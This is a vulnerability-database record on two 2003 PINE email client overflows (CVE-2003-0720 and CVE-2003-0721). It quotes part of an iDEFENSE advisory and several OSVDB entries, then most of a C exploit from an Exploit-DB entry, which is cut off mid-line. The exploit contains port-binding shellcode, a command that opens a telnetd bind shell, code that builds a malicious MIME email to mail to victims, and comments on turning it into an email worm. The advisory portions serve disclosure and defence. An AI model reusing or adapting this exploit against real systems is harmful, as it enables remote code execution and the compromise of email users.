the\r\nmessage/external-body type attribute name/value pairs. Failure to check\r\nthat the length of the longest attribute is less than the space\r\navailable allows a maliciously formed e-mail message to overwrite\r\ncontrol structures. Careful modification of these values allows\r\narbitrary code execution. However, exploitation requires knowledge of\r\nthe targeted version of PINE.\r\n\r\nA 20kb character array is declared as:\r\n\r\nheaders.h:\r\n#define SIZEOF_20KBUF (20480)\r\n\r\npine.c:\r\nchar tmp_20k_buf[SIZEOF_20KBUF];\r\n\r\nThe tmp_20k_buf[] array is stored within the .bss section and\r\nreferenced with a character pointer 'd'. The overflow occurs within\r\nthe following snippet of code from the display_parameters() routine in\r\nmailview.c:\r\n\r\nd = tmp_20k_buf;\r\nif(parmlist = rfc2231_newparmlist(params)){\r\n while(rfc2231_list_params(parmlist) && d < tmp_20k_buf + 10000){\r\n sprintf(d, "%-*s: %s\n", longest, parmlist->attrib,\r\n parmlist->value ? strsquish(tmp_20k_buf + 11000,\r\n parmlist->value, 100)\r\n : "");\r\n d += strlen(d);\r\n }\r\n\r\nStarting at 'd', the code adds spaces to the left of the string as\r\npadding to make the total length of the parameter attribute string\r\nequal to that of the 'longest'. Later displaying the Attribute\r\nname/value pairs. Example:\r\n\r\nAccess-Type: ftp\r\n URL: ftp://localhost/pub/interesting.ps\r\n\r\nSupplying any attribute name that is over 20kb in length will overflow\r\nthe buffer, eventually allowing for arbitrary code execution.\r\n\r\n\r\n- --- Vulnerability 2: Integer Overflow ---\r\n\r\nA remotely exploitable integer overflow exists in the parsing of e-mail\r\nheaders, allowing for arbitrary code execution upon the opening of a\r\nmalicious e-mail. The vulnerability exists within the\r\nrfc2231_get_param() routine found in the strings.c file. A character\r\narray of size 64 is declared:\r\n\r\n#define RFC2231_MAX 64\r\n...\r\nchar *pieces[RFC2231_MAX];\r\n\r\nand indexed by the signed integer variable 'n':\r\n\r\nif(n < RFC2231_MAX){\r\n pieces[n] = parms->value;\r\n\r\nThe variable 'n' is attacker-controlled and can be set to contain a\r\nnegative value that satisfies the if statement yet references an\r\nout-of-bounds index within the pieces[] array. Arbitrary code execution\r\nis possible by storing assembly code within the parms->value structure\r\nand writing beyond the 64-byte character array, thereby overwriting the\r\nstored instruction pointer on the stack.\r\n\r\nIII. ANALYSIS\r\n\r\nIf an attacker were to socially engineer a PINE user into opening a\r\nmalformed e-mail message, arbitrary code embedded within can then run\r\nwith privileges of the currently logged on user. It would be trivial\r\nfor this exploit to be fashioned into a worm, targeting e-mail\r\naddresses found in any readable text files (inbox, etc.).\r\n\r\nIV. DETECTION\r\n\r\nPINE 4.56 and earlier is vulnerable.\r\n\r\nV. VENDOR FIX\r\n\r\nPINE 4.58, which fixes both of these issues, is available at\r\nhttp://www.washington.edu/pine/getpine/ .\r\n\r\nVI. CVE INFORMATION\r\n\r\nThe Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project\r\nhas assigned the following identification numbers to these issues:\r\n\r\nCAN-2003-0720: Vulnerability 1 - PINE buffer overflow in its handling\r\nof the 'message/external-body' type.\r\nCAN-2003-0721: Vulnerability 2 - PINE integer overflow in MIME header\r\nparsing.\r\n\r\nVII. DISCLOSURE TIMELINE\r\n\r\n15 AUG 2003 Issues acquired by iDEFENSE\r\n25 AUG 2003 Issues disclosed to pine@cac.washington.edu\r\n25 AUG 2003 Response from Mark Crispin, University of Washington\r\n26 AUG 2003 Issues disclosed to iDEFENSE clients\r\n04 SEP 2003 Issues disclosed to Linux vendors: vendor-sec@lst.de\r\n10 SEP 2003 Coordinated Public Disclosure\r\n\r\nVIII. CREDIT\r\n\r\nzen-parse (zen-parse@gmx.net) discovered these vulnerabilities.\r\n\r\n\r\nGet paid for security research\r\nhttp://www.idefense.com/contributor.html\r\n\r\nSubscribe to iDEFENSE Advisories:\r\nsend email to listserv@idefense.com, subject line: "subscribe"\r\n\r\n\r\nAbout iDEFENSE:\r\n\r\niDEFENSE is a global security intelligence company that proactively\r\nmonitors sources throughout the world - from technical\r\nvulnerabilities and hacker profiling to the global spread of viruses\r\nand other malicious code. Our security intelligence services provide\r\ndecision-makers, frontline security professionals and network\r\nadministrators with timely access to actionable intelligence\r\nand decision support on cyber-related threats. For more information,\r\nvisit http://www.idefense.com .\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.0.2\r\n\r\niQA/AwUBP19IUfrkky7kqW5PEQJ3awCfY/2ScdjVnZAj9KDzj6QIt8MTkVsAoOWV\r\n4DzDuqzJICAPOFj5DDcq4gZo\r\n=C8eA\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2003-09-11T00:00:00", "title": "iDEFENSE Security Advisory 09.10.03: Two Exploitable Overflows in PINE", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:08", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2003-0721", "CVE-2003-0720"], "modified": "2003-09-11T00:00:00", "id": "SECURITYVULNS:DOC:5084", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5084", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:07", "references": [], "edition": 1, "description": "# No description provided by the source\n\n## References:\nRedHat RHSA: RHSA-2003:273\nOVAL ID: 503\nISS X-Force ID: 13151\n[CVE-2003-0721](https://vulners.com/cve/CVE-2003-0721)\nBugtraq ID: 8589\n", "reporter": "OSVDB", "published": "2003-09-10T00:00:00", "title": "Pine rfc2231_get_param Remote Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "affectedSoftware": [], "bulletinFamily": "software", "cvelist": ["CVE-2003-0721"], "modified": "2003-09-10T00:00:00", "id": "OSVDB:11774", "href": "https://vulners.com/osvdb/OSVDB:11774", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:04", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Pine. The display_parameters() function fails to perform proper bounds checking resulting in a buffer overflow. By sending an email message with an overly long name attribute, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 4.58 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in Pine. The display_parameters() function fails to perform proper bounds checking resulting in a buffer overflow. By sending an email message with an overly long name attribute, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.washington.edu/pine/\n[Vendor Specific Advisory URL](http://www.linuxsecurity.com/advisories/engarde_advisory-3607.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com/atualizacoes/index.php?id=a&anuncio=000738)\n[Vendor Specific Advisory URL](http://cc.turbolinux.com/security/TLSA-2003-57.txt)\n[Vendor Specific Advisory URL](http://www.slackware.com/security/viewer.php?l=slackware-security&y=2003&m=slackware-security.347016)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20031002-01-U.asc)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2003_037_pine.html)\nSecurity Tracker: 1007672\n[Secunia Advisory ID:9705](https://secuniaresearch.flexerasoftware.com/advisories/9705/)\nRedHat RHSA: RHSA-2003:273\nOther Advisory URL: http://archives.neohapsis.com/archives/bugtraq/2003-09/0181.html\nISS X-Force ID: 13150\nGeneric Exploit URL: http://www.darkircop.org/security/exploits/sorpine.c\n[CVE-2003-0720](https://vulners.com/cve/CVE-2003-0720)\nBugtraq ID: 8588\n", "reporter": "zen-parse()", "published": "2003-09-10T15:03:04", "title": "Pine display_parameters() Function Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Pine", "version": "4.56", "operator": "eq"}], "cvelist": ["CVE-2003-0720"], "modified": "2003-09-10T15:03:04", "href": "https://vulners.com/osvdb/OSVDB:9003", "id": "OSVDB:9003", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T11:42:42", "osvdbidlist": ["9003"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Pine <= 4.56 Remote Buffer Overflow Exploit. CVE-2003-0720. Remote exploit for linux platform", "reporter": "sorbo", "published": "2003-09-16T00:00:00", "type": "exploitdb", "title": "Pine <= 4.56 - Remote Buffer Overflow Exploit", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0720"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2003-09-16T00:00:00", "id": "EDB-ID:99", "href": "https://www.exploit-db.com/exploits/99/", "sourceData": "/*\r\n * Mon Sep 15 09:35:01 CEST 2003\r\n *\r\n * (remote?) Pine <= 4.56 exploit\r\n * by sorbo (sorbox yahoo com)\r\n * darkirco\r\n *\r\n * Ok won't talk much about the bug since as usual idefense advisories\r\n * are *proper* advisories and explain everything... exploiting the bug\r\n * is trivial after reading the adv:\r\n * http://www.idefense.com/advisory/09.10.03.txt\r\n *\r\n * There are two ways of doing this:\r\n * 1) standard shellcode\r\n * we don't need offset here because of nature of hole...\r\n * all we need is distance from a variable to eip which is quite fixed\r\n * it is not like we need an \"offset somewhere in stack\"\r\n * just a relative distance\r\n *\r\n * 2) ret to libc (should work on fbsd too)\r\n * this requires our command string somewhere in memory\r\n * we may use .bss (fixed)\r\n * we also need distance from variable to ebp (quite fixed)\r\n * and we need addr of system (fixed)\r\n * This is \"own\" grsec since we don't really run a shellcode\r\n * and directly overwrite eip\r\n *\r\n * In both method i said u need the dist from var -> eip/ebp\r\n * this can actually be \"bruteforced\"\r\n * I didn't show this since this is a PoC and uses \"exact offsets\"\r\n * All u do is supply multiple charsets and overwrite larger areas of memory\r\n * This makes method 1 100% successfull (or letys say 99.9%)\r\n * (nice for remote exploitation)\r\n *\r\n * Method 2 is \"slightly harder\" to bruteforce since u must NOT overwrite \r\n * eip... so u must \"stop ur bruteforce ad ebp\" somehow... but thats kinda\r\n * gay ;D\r\n *\r\n * With unfallable method one a worm can easily be done...\r\n * shellcode that listens and uploads worm...\r\n * and executes a grep \\@ /var/spool/mail/bla or whatever to get emails\r\n * or pine addr book\r\n *\r\n * also for normal \"owning\" u can use reverse telnetd shellcode\r\n * so u just keep a server up and don't have to \"wait\" for person\r\n * to launch sploit\r\n *\r\n * Greetz: zen-parse (thanks for your patience (if im not in ur ignore ;D))\r\n *\t\tnon metto i soliti stronzi de merda nei greetz (tipo gunzip ;D)\r\n *\t\te specialmente kuelle ke non me la danno ;D ahahah\r\n *\r\n *\t\t#areyoucrazy@ircnet\r\n *\t\t\t(most leet chan... fill it up with ur bots ;D)\r\n *\r\n *\tand last but not least... the world must know: s0lar TI AMO!!!\r\n *\r\n *\r\n * ok enough... hope this exp is lame enough i wanted to close my summer\r\n * vacation with it and proove the world i had nothing better to do =D\r\n * college is starting c ya\r\n *\r\n * to own remotely: ./sorpine -o 1 -t bla bla com | sendmail -t\r\n *\r\n * Enjoy have fun!\r\n *\r\n */\r\n\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <sys/ptrace.h>\r\n#include <errno.h>\r\n#include <linux/user.h>\r\n#include <sys/wait.h>\r\n#include <sys/types.h>\r\n#include <signal.h>\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n \r\n \r\n#define PINE \"/usr/bin/pine\"\r\n#define PLIST 50\t/* a location buff-PLIST that is writable (.bss) */\r\n\r\n/* port bind command ;D\r\n * from vi spawn a shell duh...\r\n *\r\n */\r\nchar *lame_cmd = \r\n\"/usr/sbin/in.telnetd -L /usr/bin/vi -debug 6682 & /bin/killall -9 pine\";\r\n\r\n\r\nstruct target_info {\r\n\tchar desc[1024];\r\n\tint method;\t/* 0 easy , 1 hard */\r\n\tint dist;\t/* eip or ebp depending on method */\r\n\tint buff;\r\n\tint sys;\r\n};\r\n\r\n\r\n\r\n/*\r\n * notice to slackware maintainers:\r\n * sorry guyz.. its not that im against u\r\n * its that I only use slack =(\r\n * thats y all my exps only have slack targets ;D\r\n * keep up the good work =D\r\n * plus... its free advertisment for u!\r\n *\r\n */\r\nstruct target_info targets[] = {\r\n\r\n{ \"Slackware 9.0\",0,300,0,0},\r\n{ \"Slackware 9.0\",1,296,0x083c8f15,0x0804aeda},\r\n\r\n{ \"Slackware 8.1\",0,284,0,0},\r\n{ \"Slackware 8.1\",1,280,0x0838e0d5,0x0804aeca},\r\n\r\n{ \"Slackware 8.0\",0,284,0,0},\r\n{ \"Slackware 8.0\",1,280,0x0836d875,0x0804a5ba}\r\n};\r\n\r\n\r\n/*\r\n * Non usable chars in egg (sc and various addrs)\r\n * \r\n */\r\nchar nonusable[] = \"\\x09\\x0a\\x0d\\x28\\x29\\x5c\";\r\n\r\n/*\r\n * lame (but working??) modification of sorshell\r\n * no setsockopt() =((( too long\r\n * portbinding shellcode with terminal support\r\n * (if whatever i said makes sense)\r\n * port 6682\r\n * telnet ip 6682\r\n * ^]\r\n * telnet> mode character\r\n *\r\n * funny how my ret to libc does the same thing and its 0 byte shellcode ;D\r\n *\r\n */\r\nchar shellcode[] =\r\n\"\\x31\\xc9\\xf7\\xe1\\xb0\\x02\\xcd\\x80\\x39\\xc8\\x74\\x05\\x31\\xc0\\x40\\xcd\\x80\\x31\"\r\n\"\\xc0\\xb0\\x06\\x50\\xb0\\x01\\x50\\x89\\xc3\\x40\\x50\\xb0\\x66\\x89\\xe1\\xcd\\x80\\x89\"\r\n\"\\xc2\\x31\\xdb\\x53\\x66\\xb9\\x1a\\x1a\\xc1\\xe1\\x10\\xb1\\x02\\x51\\x89\\xe1\\x6a\\x10\"\r\n\"\\x51\\x52\\x89\\xe1\\xb0\\x66\\xb3\\x02\\xcd\\x80\\x6a\\x01\\x52\\x89\\xe1\\xb0\\x66\\xb3\"\r\n\"\\x04\\xcd\\x80\\x31\\xc0\\x50\\x50\\x52\\x89\\xe1\\xb0\\x66\\x43\\xcd\\x80\\x89\\xc7\\x89\"\r\n\"\\xd3\\x89\\xc1\\xb0\\x06\\x89\\xc8\\x31\\xd2\\x52\\x68\\x70\\x74\\x6d\\x78\\x68\\x64\\x65\"\r\n\"\\x76\\x2f\\x68\\x2f\\x2f\\x2f\\x2f\\x31\\xc9\\xb1\\x02\\x89\\xe3\\xb0\\x05\\xcd\\x80\\x89\"\r\n\"\\xc6\\x52\\x89\\xe2\\xb9\\x31\\x54\\x04\\x40\\x89\\xf3\\xb0\\x36\\xcd\\x80\\x89\\xe2\\xb9\"\r\n\"\\x30\\x54\\x04\\x80\\xb0\\x36\\xcd\\x80\\x59\\x83\\xc1\\x30\\xc1\\xe1\\x18\\xba\\x01\\x74\"\r\n\"\\x73\\x2f\\xc1\\xea\\x08\\x01\\xca\\x31\\xc9\\x51\\x52\\x31\\xd2\\x68\\x65\\x76\\x2f\\x70\"\r\n\"\\x68\\x2f\\x2f\\x2f\\x64\\xb1\\x02\\x89\\xe3\\xb0\\x05\\xcd\\x80\\x89\\xc2\\xb0\\x02\\xcd\"\r\n\"\\x80\\x31\\xc9\\x39\\xc8\\x75\\x3f\\xb0\\x42\\xcd\\x80\\xb1\\x03\\x31\\xc0\\x89\\xd3\\xb0\"\r\n\"\\x3f\\x49\\xcd\\x80\\x41\\xe2\\xf8\\x89\\xd3\\xb0\\x06\\xcd\\x80\\x89\\xf3\\xb0\\x06\\xcd\"\r\n\"\\x80\\x89\\xfb\\xb0\\x06\\xcd\\x80\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\"\r\n\"\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80\\x89\\xd3\"\r\n\"\\x31\\xc0\\xb0\\x06\\xcd\\x80\\x83\\xec\\x50\\x31\\xc9\\xf7\\xe1\\x31\\xdb\\x89\\xf9\\x43\"\r\n\"\\xd3\\xe3\\x01\\xd8\\x89\\xf1\\x31\\xdb\\x43\\xd3\\xe3\\x01\\xd8\\x50\\x89\\xda\\x89\\xcb\"\r\n\"\\x43\\x89\\xe1\\x52\\x57\\x56\\x31\\xff\\x31\\xf6\\x31\\xc0\\x99\\xb0\\x8e\\xcd\\x80\\x5e\"\r\n\"\\x5f\\x5b\\x58\\x21\\xd8\\x31\\xdb\\x39\\xc3\\x75\\x1b\\xb2\\x50\\x89\\xe1\\x89\\xfb\\x31\"\r\n\"\\xc0\\xb0\\x03\\xcd\\x80\\x83\\xf8\\x01\\x7c\\x26\\x89\\xc2\\x89\\xf3\\xb0\\x04\\xcd\\x80\"\r\n\"\\xeb\\xad\\xb2\\x50\\x89\\xe1\\x89\\xf3\\x31\\xc0\\xb0\\x03\\xcd\\x80\\x83\\xf8\\x01\\x7c\"\r\n\"\\x0b\\x90\\x89\\xc2\\x89\\xfb\\xb0\\x04\\xcd\\x80\\xeb\\x91\\x31\\xc0\\x40\\xcd\\x80\";\r\n\r\n\r\n/* cause a break and have a \"test\" number to check */\r\nchar testsc[] = \"\\xcc\\x01\\x02\\x03\\x04\";\r\n\r\nstruct bss {\r\n\tint start;\r\n\tint end;\r\n};\r\n\r\nchar mail[6666];\t/* this is basically the \"egg\" */\r\n\r\nvoid die(int i, char *m) {\r\n if(i)\r\n perror(m);\r\n else\r\n printf(\"%s\\n\",m);\r\n exit(0);\r\n}\r\n\r\n\r\n/*\r\n * prepare boring part of email\r\n *\r\n */\r\nvoid prepare_mail(char *from, char *sub, char *to) {\r\n\tsnprintf(mail,sizeof(mail),\r\n\t\t\t\"From: %s\\n\"\r\n\t\t\t\"Subject: %s\\n\"\r\n\t\t\t\"To: %s\\n\"\r\n\t\t\t\"MIME-Version: 1.0\\n\"\r\n\t\t\t\"Content-Type: multipart/related;\\n\"\r\n\t\t\t\" type=\\\"multipart/alternative\\\";\\n\"\r\n\t\t\t\" boundary=sorbo-rox\\n\\n\"\r\n\t\t\t\"--sorbo-rox\\n\",from,sub,to);\r\n}\r\n\r\n\r\n/*\r\n * ok here da tricky bit\r\n * arg: number of bytes (distance)\r\n *\r\n * it returns a positive unsigned int\r\n * that becomes negative when singed\r\n * that when *4 becomes signed\r\n * matching our distance\r\n * yeah kinda dirty... i hate numbers ;D\r\n * w00t\r\n *\r\n */\r\nunsigned int num(int dist) {\r\n int tmp = -1-dist;\r\n unsigned int border = tmp;\r\n int neg = (border/4)*(-1);\r\n unsigned int res;\r\n\r\n res = 0xffffffff+neg;\r\n\r\n return res;\r\n}\r\n\r\n/*\r\n * ret-to-libc system() grsex 0wned\r\n *\r\n * we overwrite ebp\r\n * we control esp (heap)\r\n * we make stack perfect and make it ret to system\r\n * \r\n *\r\n * conditions plist must be writable (bss is ok)\r\n * we must know addr of ptr to our command (bss is fixed)\r\n *\r\n * NOTE: segfault after shell is NORMAL since it will return to plist addr\r\n *\r\n */\r\nvoid own_hard(int sys, int plist, int cmd, int dist, char *command) {\r\n\tchar egg[1024];\r\n\t\r\n\tint *ptr = (int*)&egg[0];\r\n\t\r\n\t*ptr = 0x41414141; /* ebp */\r\n\tptr++;\r\n\t*ptr = sys; /* system */\r\n\tptr++;\r\n\t*ptr = plist; /* ret / plist */\r\n\tptr++;\r\n\t*ptr = cmd; /* /bin/sh */\r\n\tptr++;\r\n\t*ptr = 0;\r\n\r\n\t/* practice: exploit this exploit =D */\t\r\n\tsprintf(mail+strlen(mail),\r\n\t\t\"Content-Type: message/external-body;\\n\"\r\n\t\t\" access-type=\\\"%s\\\";\\n\"\r\n\t\t\" charset*%u*=\\\"%s\\\";\\n\"\r\n\t\t\"Content-Transfer-Encoding: 8bit\\n\"\r\n\t\t\"--sorbo-rox--\\n\",\r\n\t\tcommand,num(dist), egg);\r\n\t\r\n}\r\n\r\n/*\r\n * we overwrite ret addr and own it\r\n * no offset needed since we control area pointer by ret directly\r\n * well we do need the stack distance from params to eip\r\n *\r\n */\r\nvoid own_easy(int dist, char *s) {\r\n\r\n\t/* practice: exploit this exploit =D */\t\r\n\tsprintf(mail+strlen(mail),\r\n\t\t\"Content-Type: text/html;\\n\"\r\n\t\t\" charset*%u*=\\\"%s\\\";\\n\"\r\n\t\t\"Content-Transfer-Encoding: 8bit\\n\"\r\n\t\t\"--sorbo-rox--\\n\",\r\n\t\tnum(dist), s);\r\n\r\n}\r\n\r\n/* create a lame pinerc */\r\nvoid pinerc() {\r\n\tint pid;\r\n\t\r\n\tpid = fork();\r\n\tif(pid == -1)\r\n\t\tdie(1,\"fork()\");\r\n\t\r\n\tif(!pid) {\r\n\t\tchar *arg[] = { \"pine\",\"-p\",\"/tmp/pinerc\", NULL };\r\n\t\tclose(1);\r\n\t\tclose(2);\r\n\t\t\r\n\t\texecve(PINE,arg,NULL);\r\n\t\tdie(1,\"execve()\");\r\n\t}\r\n\telse {\r\n\t\tsleep(1);\r\n\t\tkill(pid,SIGKILL);\r\n\t\twait(NULL);\r\n\t}\r\n\t\r\n\tif(system(\"grep -v inbox-path /tmp/pinerc > /tmp/o \"\r\n\t\t\"&& mv /tmp/o /tmp/pinerc && \"\r\n\t\t\"echo inbox-path=/tmp/meil >> /tmp/pinerc\")<0)\r\n\t\tdie(1,\"system()\");\r\n}\r\n\r\nvoid write_mail(char *path) {\r\n\tFILE *f;\r\n\t\r\n\tf = fopen(path,\"w\");\r\n\tif(!f)\r\n\t\tdie(1,\"fopen()\");\r\n\t\r\n\tif(fprintf(f,\"From sorbo Tue Nov 29 00:00:00 1983\\n%s\",mail) < 1)\r\n\t\tdie(1,\"fprintf()\");\r\n\r\n\tfclose(f);\t\t\r\n}\r\n\r\nchar *line;\r\n\r\n/* get a free tty */\r\nint getty(int *master, int *slave) {\r\n if ((*master = open(\"/dev/ptmx\", O_RDWR)) == -1)\r\n return -1;\r\n\r\n if (grantpt(*master) == -1 ||\r\n unlockpt(*master) == -1 ||\r\n (line = (char*)ptsname(*master)) == NULL ||\r\n (*slave = open(line, O_RDWR)) == -1) {\r\n\r\n close(*master);\r\n return -1;\r\n }\r\n\r\n return 0;\r\n}\r\n\r\n/* fire up debugged process (and continue && wait) */\r\nint start_debug(int cont) {\r\n int pid = fork();\r\n\tint slave,master;\r\n\t\r\n\t/* we associate it to tty cuz ncurses fucks up screen */\r\n\tif( getty(&master,&slave) == -1)\r\n\t\tdie(0,\"getty()\");\r\n\r\n if(pid == -1)\r\n die(1,\"fork()\");\r\n\r\n /* child */\r\n if(!pid) {\r\n char *arg[] = { \"pine\", \"-p\",\"/tmp/pinerc\",\"-I\",\r\n \t\"l,>,>,<,<,q,y\",NULL };\r\n\r\n if(ptrace(PTRACE_TRACEME,NULL,NULL)==-1)\r\n die(1,\"ptrace()\");\r\n\r\n\t\tif ((pid = open(line, O_RDWR)) == -1)\r\n\t\t\tdie(1,\"open()\");\r\n\t\t \r\n \r\n\t\tdup2(pid,0);\r\n \t\tclose(1);\r\n \t\tclose(2);\r\n execv(PINE,arg);\r\n die(1,\"execve()\");\r\n }\r\n else {\r\n\t\twait(NULL);\r\n\t\tif(cont) {\r\n\t if(ptrace(PTRACE_CONT,pid,0,0) == -1)\r\n\t die(1,\"ptrace()\");\r\n\t\t\twait(NULL);\r\n\t\t}\r\n\t}\r\n\treturn pid;\r\n}\r\n\r\nvoid stop_debug(int pid) {\r\n if(ptrace(PTRACE_KILL,pid,0,0) == -1)\r\n \tdie(1,\"ptrace()\");\r\n\r\n\twait(NULL);\r\n}\r\n\r\n/* \r\n * 0 = nope\r\n * 1 = yea\r\n * duh ;D\r\n *\r\n */\r\nint test_dist() {\r\n struct user_regs_struct regs;\r\n int x;\r\n \r\n int pid = start_debug(1);\r\n \r\n\r\n if(ptrace(PTRACE_GETREGS,pid,NULL,&regs)==-1)\r\n\t\treturn 0;\t/* exited normally prolly */\r\n\r\n// printf(\"EIP=%x\\n\",regs.eip);\t\t\r\n\tx = ptrace(PTRACE_PEEKTEXT,pid,regs.eip,NULL);\r\n if(x == -1 && errno != 0 && errno != EIO)\r\n \tdie(1,\"ptrace()\");\r\n//\t\tprintf(\"INSTR=%x\\n\",x); \r\n \r\n\r\n\tstop_debug(pid);\r\n\r\n\tif(x == *((int*)&testsc[1])) \r\n\t\treturn 1;\r\n\t\t\r\n\treturn 0;\r\n}\r\n\r\n/* popen and get line */\r\nchar *getShit(char *cmd) {\r\n FILE *f;\r\n static char buff[1024];\r\n\r\n f = popen(cmd,\"r\");\r\n\r\n if(f == NULL) {\r\n perror(\"popen\");\r\n exit(0);\r\n }\r\n\r\n buff[0] = 0;\r\n\r\n fgets(buff,sizeof(buff),f);\r\n pclose(f);\r\n\r\n return &buff[0];\r\n\r\n}\r\n\r\n/* get a number from a popen */\r\nint getInt(char *p) {\r\n char *ptr = getShit(p);\r\n int ret = 0;\r\n if(sscanf(ptr,\"%x\",&ret)!=1) {\r\n printf(\"Error in getting addr\\n\");\r\n exit(0);\r\n }\r\n return ret;\r\n}\r\n\r\n/* get start and end of bss */\r\nstruct bss getbss() {\r\n\tstruct bss b;\r\n\t\r\n\tb.start = getInt(\"objdump --headers \"\r\n\t\tPINE\" | grep \\\" .bss\\\" | awk '{print $4}'\");\r\n\tb.end = getInt(\"objdump --headers \"\r\n\t\tPINE\" | grep \\\" .bss\\\" | awk '{print $3}'\");\r\n\t\r\n\tb.end += b.start;\t\t\r\n\r\n\treturn b;\r\n}\r\n\r\n/* find our buff (command) in the process memory .bss */\r\nint findbuf(int ebp) {\r\n\tstruct bss b;\r\n\tint pid;\r\n\tint cmd = 0x12345678;\r\n\tint addr;\r\n\tint ret = -1;\r\n struct user_regs_struct regs;\r\n\tint x;\r\n\r\n\t\r\n\tb = getbss();\r\n\t\r\n\tprintf(\".bss START =0x%.8x END=0x%.8x\\n\",b.start,b.end);\r\n\tprepare_mail(\"from\",\"subj\",\"to\");\r\n\town_hard(0x41414141,b.start,b.start,ebp,(char*)&cmd);\r\n\twrite_mail(\"/tmp/meil\");\r\n\r\n\taddr = b.start;\r\n\r\n pid = start_debug(1);\r\n\r\n\r\n if(ptrace(PTRACE_GETREGS,pid,NULL,&regs)==-1)\r\n\t\treturn -1;\t/* exited normally prolly */\r\n\t\t\r\n// printf(\"EIP=%x\\n\",regs.eip);\t\t\r\n\tif(regs.eip != 0x41414141)\r\n\t\treturn -1;\r\n\t\t\r\n\tfor(addr = b.start; addr < b.end; addr++) {\r\n\t\tprintf(\"Checking 0x%.8x\\r\",addr);\r\n\t\tfflush(stdout);\r\n\t\tx = ptrace(PTRACE_PEEKTEXT,pid,addr,NULL);\r\n if(x == -1 && errno != 0)\r\n \t\t die(1,\"ptrace()\");\r\n\t\tif(x == cmd) {\r\n\t\t\tret = addr;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tstop_debug(pid);\r\n\tputchar('\\n');\t\t\r\n\treturn ret;\r\n}\r\n\r\n/* get system from libc */\r\nint getSystem() {\r\n int base;\r\n int offset;\r\n char tmp[1024*2];\r\n\tchar libc[512];\r\n\r\n /* binary specific */\r\n base = getInt(\"ldd \" PINE \r\n \t\" | grep \\\"libc\\\\.\\\" | awk '{print $4}' | tr -d \\\"()\\\"\");\r\n// printf(\"GLIBC base addr 0x%.8x\\n\",base);\r\n\r\n /* get libc path */\r\n snprintf(libc,sizeof(libc),\"%s\",getShit(\"ldd \" PINE \r\n \t\" | grep \\\"libc\\\\.\\\" | awk '{print $3}'\"));\r\n \r\n if(strlen(libc) <2) {\r\n printf(\"can't get libc location\\n\");\r\n exit(0);\r\n }\r\n libc[strlen(libc)-1] = 0;\r\n\r\n /* lib specific */\r\n snprintf(tmp,sizeof(tmp),\"objdump -T %s | grep \\\\ system | \"\r\n \t\"awk '{print $1}' \",libc);\r\n\r\n offset = getInt(tmp);\r\n // printf(\"GLIBC __libc_system offset 0x%.8x\\n\",offset);\r\n\r\n offset += base;\r\n\r\n // printf(\"system() addr 0x%.8x\\n\",offset);\r\n\r\n return offset;\r\n\r\n}\r\n\r\n/* check if offset contains non usable chars */\r\nint isUsable(int x) { \r\n\tint i,j;\r\n\t\r\n\tfor(i = 0; i < sizeof(x); i++) \r\n\t\tfor(j =0; j < sizeof(nonusable); j++) \r\n\t\t\tif( *(((unsigned char*)&x)+i) == nonusable[j]) \r\n\t\t\t\treturn 0;\r\n\treturn 1;\r\n}\r\n\r\n/* get various system offsets */\r\nint *getSystemOffsets() {\r\n\tstatic int off[3];\r\n\tint pid;\r\n\tint x;\r\n\t\r\n\toff[0] = getSystem();\r\n\toff[1] = getInt(\"objdump -T \"PINE\" | grep system | awk '{print $1}'\");\r\n\toff[2] = getInt(\"objdump -R \"PINE\" | grep system | awk '{print $1}'\");\r\n\r\n\tpid = start_debug(0);\r\n\tx = ptrace(PTRACE_PEEKTEXT,pid,off[2],NULL);\r\n\r\n if(x == -1 && errno != 0)\r\n \tdie(1,\"ptrace()\");\r\n off[2] = x;\r\n \r\n\tstop_debug(pid);\r\n \r\n\treturn &off[0];\r\n}\r\n\r\n/* get target from local pine */\r\nstruct target_info getTarget() {\r\n\tstruct target_info target;\r\n\tint *sysa;\r\n\tint i;\r\n\tchar os[512];\r\n\r\n\t/* get a description of target */\r\n\tsnprintf(os,sizeof(os),getShit(\"uname -sr | tr -d '\\n'\"));\r\n\tsnprintf(target.desc,sizeof(target.desc),\"%s Pine %s\",os,\r\n\t\tgetShit(PINE\" -v | awk '{print 